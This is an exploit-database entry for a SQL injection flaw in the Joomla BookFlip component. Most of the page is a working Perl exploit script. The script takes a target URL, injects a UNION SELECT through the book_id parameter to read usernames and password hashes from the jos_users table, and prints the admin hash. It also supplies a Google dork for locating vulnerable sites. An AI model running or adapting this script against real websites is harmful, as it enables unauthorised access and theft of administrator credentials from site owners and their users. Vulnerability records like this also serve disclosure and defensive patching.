Joomla com_bookflip (book_id) Remote SQL Injection Vulnerability

2009-07-09 / 2009-07-10
Credit: boom3rang
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w #Joomla com_bookflip(book_id) Sql injection# ######################################## #[~] Author : boom3rang #[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan #--------------------------------------- #[!] <name>BookFlip</name> #[!] <creationDate>Juin 2008</creationDate> #[!] <author>FCI F-Cimag-In</author> #[!] <copyright>Ce composant est distribu&#195;&#169; gratuitement.</copyright> #[!] <authorEmail>postmaster@f-cimag-in.com</authorEmail> #[!] <authorUrl>www.f-cimag-in.com</authorUrl> #[!] <version>2.1</version> #--------------------------------------- #[!] Google_Dork: inurl:"com_bookflip" ######################################## system("color FF0000"); print "\t ###############################################################\n\n"; print "\t # Kosova Hackers Group (KHG-CREW) #\n\n"; print "\t ###############################################################\n\n"; print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n"; print "\t # - R.I.P redc00de #\n\n"; print "\t # - Cod3d by boom3rang #\n\n"; print "\t ###############################################################\n\n"; use LWP::UserAgent; print "\nTarget page:[http://wwww.localhost/pathdir/]: "; chomp(my $target=<STDIN>); #Column Name $c_n="concat(username,0x3a,password)"; #Table_name $t_n="jos_users"; $U="-9999+UNION+SELECT+"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n\n"; print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n"; } else{print "\n[-] Veprimi Deshtoi (Not Found)...\n"; } ######################## # - Proud 2 be Albanian # - Proud 2 be Muslim ########################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top